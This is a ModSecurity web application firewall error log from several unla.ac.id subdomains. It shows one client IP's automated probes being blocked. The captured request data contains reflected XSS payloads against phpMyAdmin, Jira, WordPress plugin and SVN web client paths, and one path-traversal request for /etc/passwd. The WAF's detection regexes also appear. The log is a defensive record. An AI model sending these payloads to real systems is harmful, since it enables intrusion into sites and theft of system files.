[Tue Aug 29 11:51:17.880734 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAm7m9YAAAAE"]
[Tue Aug 29 11:51:18.530917 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RsCo-f0AAAm-MccAAAAI"]
[Tue Aug 29 11:51:18.541005 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15RsCo-f0AAAmNp3YAAAAQ"]
[Tue Aug 29 11:51:18.541402 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RsCo-f0AAAnDFyIAAAAM"]
[Tue Aug 29 11:51:19.819692 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15R8Co-f0AAAnIlfoAAAAV"]
[Tue Aug 29 11:51:20.533701 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15SMCo-f0AAAmQ-wkAAAAb"]
[Tue Aug 29 11:51:20.535836 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAnHQdYAAAAT"]
[Tue Aug 29 11:51:20.536921 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAm7m9sAAAAE"]
[Tue Aug 29 11:51:20.537859 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAmHd@QAAAAz"]
[Tue Aug 29 11:51:20.538142 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAnMepEAAAAD"]
[Tue Aug 29 11:51:20.625387 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAmHd@UAAAAz"]
[Tue Aug 29 11:51:20.627691 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAlIBhgAAAAn"]
[Tue Aug 29 11:51:20.627910 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15SMCo-f0AAAm91m0AAAAG"]
[Tue Aug 29 11:51:20.675372 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAmQ-wsAAAAb"]
[Tue Aug 29 11:51:20.702991 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAnHQdgAAAAT"]
[Tue Aug 29 11:51:20.724292 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm7m90AAAAE"]
[Tue Aug 29 11:51:20.725301 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAmNp38AAAAQ"]
[Tue Aug 29 11:51:20.726955 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm91m4AAAAG"]
[Tue Aug 29 11:51:21.536477 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAkr0FIAAAAC"]
[Tue Aug 29 11:51:21.539219 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAm7m94AAAAE"]
[Tue Aug 29 11:51:21.551159 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAhhc1MAAAAd"]
[Tue Aug 29 11:51:21.592023 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnB5U0AAAAJ"]
[Tue Aug 29 11:51:21.628007 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAmNp4EAAAAQ"]
[Tue Aug 29 11:51:21.628304 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAlUliMAAAA0"]
[Tue Aug 29 11:51:21.628923 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm80OcAAAAF"]
[Tue Aug 29 11:51:21.629404 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAlIBhsAAAAn"]
[Tue Aug 29 11:51:21.648934 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAmLPScAAAAN"]
[Tue Aug 29 11:51:21.648940 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAknEOgAAAAB"]
[Tue Aug 29 11:51:21.654984 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnHQdoAAAAT"]
[Tue Aug 29 11:51:21.672853 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnTlJ4AAAAA"]
[Tue Aug 29 11:51:21.693259 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnMepQAAAAD"]
